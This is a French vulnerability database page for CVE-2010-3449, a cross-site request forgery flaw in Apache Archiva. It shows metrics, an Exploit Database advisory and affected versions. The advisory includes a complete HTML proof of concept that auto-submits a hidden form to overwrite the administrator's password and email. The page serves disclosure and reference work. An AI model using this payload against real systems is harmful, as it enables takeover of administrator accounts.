Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-352 |
Cross-Site Request Forgery (CSRF) The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
6.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 15710
Date de publication : 2010-12-08 23h00 +00:00
Auteur : Anatolia Security
EDB Vérifié : Yes
ANATOLIA SECURITY ADVISORY
--------------------------------------
### ADVISORY INFO ###
+ Title: Apache Archiva Cross-site Request Forgery Vulnerability
+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
+ Advisory ID: 2010-001
+ Versions: Archiva 1.0 to 1.3.1
+ Date: 29/09/2010
+ CVE-ID: CVE-2010-3449
+ Vendor: The Apache Software Foundation
+ Impact: Gaining Administrator Privileges
+ CWE-ID: 352
+ Credit: Anatolia Security
+ References: http://archiva.apache.org/security.html
### VULNERABLE PRODUCT ###
+ Apache Archiva: "Apache Archiva is an extensible repository management software that helps taking care of your
own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as
Maven, Continuum, and ANT. Archiva offers several capabilities, amongst which remote repository proxying, security
access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning
functionality... and many more!"
+ Homepage: http://archiva.apache.org
### VULNERABILITY DETAILS ###
+ Description: Apache Archiva affects from Cross-site Request Forgery. Application don't check which form sends
credentials. Technically, attacker can create a specially crafted page and force archiva administrators to view it
and change their credentials. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha
and asking old password for action like change password. Vulnerability patched by the Apache Archiva Team.
+ Exploit/POC: http://www.anatoliasecurity.com/exploits/archiva-csrf-poc.txt
<!--
-*-*- ANATOLIA SECURITY (c) 2010 -*-*-
$ Title: Proof of Concept Code for Apache Archiva CSRF
$ ADV-ID: 2010-001
$ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt
$ Technical Details: http://www.anatoliasecurity.com
* PoC created by Eliteman
~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com
~ web: elite.anatoliasecurity.com
-->
<html>
<head>
<title> Apache Archiva CSRF PoC </title>
</head>
<body>
<form id="userEditForm" name="useredit" action="http://archiva:8080/archiva/security/useredit.action" method="post">
<input type="hidden" name="user.username" value="admin" id="userEditForm_user_username"/>
<input type="hidden" name="user.fullName" value="OWNED0DAY" id="userEditForm_user_fullName"/>
<input type="hidden" name="user.email" value="0day@zer0day.com" id="userEditForm_user_email"/>
<input type="hidden" name="user.password" value="1337owned" id="userEditForm_user_password"/>
<input type="hidden" name="user.confirmPassword" value="1337owned" id="userEditForm_user_confirmPassword"/>
<input type="hidden" name="user.locked" value="true" id="userEditForm_user_locked"/>
<input type="hidden" name="__checkbox_user.locked" value="true" />
<input type="hidden" name="user.passwordChangeRequired" value="true" id="userEditForm_user_passwordChangeRequired"/>
<input type="hidden" name="__checkbox_user.passwordChangeRequired" value="true" />
<input type="hidden" name="username" value="admin" id="userEditForm_username"/>
<input type="hidden" id="userEditForm__submit" name="method:submit" value="Update"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
Products Mentioned
Configuraton 0
Jesse_mcconnell>>Redback >> Version To (including) 1.2.3
Jesse_mcconnell>>Redback >> Version 1.0
Jesse_mcconnell>>Redback >> Version 1.0
Jesse_mcconnell>>Redback >> Version 1.0.1
Jesse_mcconnell>>Redback >> Version 1.0.2
Jesse_mcconnell>>Redback >> Version 1.0.3
Jesse_mcconnell>>Redback >> Version 1.1
Jesse_mcconnell>>Redback >> Version 1.1.1
Jesse_mcconnell>>Redback >> Version 1.1.2
Jesse_mcconnell>>Redback >> Version 1.2
Jesse_mcconnell>>Redback >> Version 1.2
Jesse_mcconnell>>Redback >> Version 1.2
Jesse_mcconnell>>Redback >> Version 1.2.1
Jesse_mcconnell>>Redback >> Version 1.2.2
Apache>>Archiva >> Version 1.0
Apache>>Archiva >> Version 1.0.1
Apache>>Archiva >> Version 1.0.2
Apache>>Archiva >> Version 1.0.3
Apache>>Archiva >> Version 1.1
Apache>>Archiva >> Version 1.1.1
Apache>>Archiva >> Version 1.1.2
Apache>>Archiva >> Version 1.1.3
Apache>>Archiva >> Version 1.1.4
Apache>>Archiva >> Version 1.2
Apache>>Archiva >> Version 1.2.1
Apache>>Archiva >> Version 1.2.2
Apache>>Archiva >> Version 1.3
Apache>>Archiva >> Version 1.3.1
Références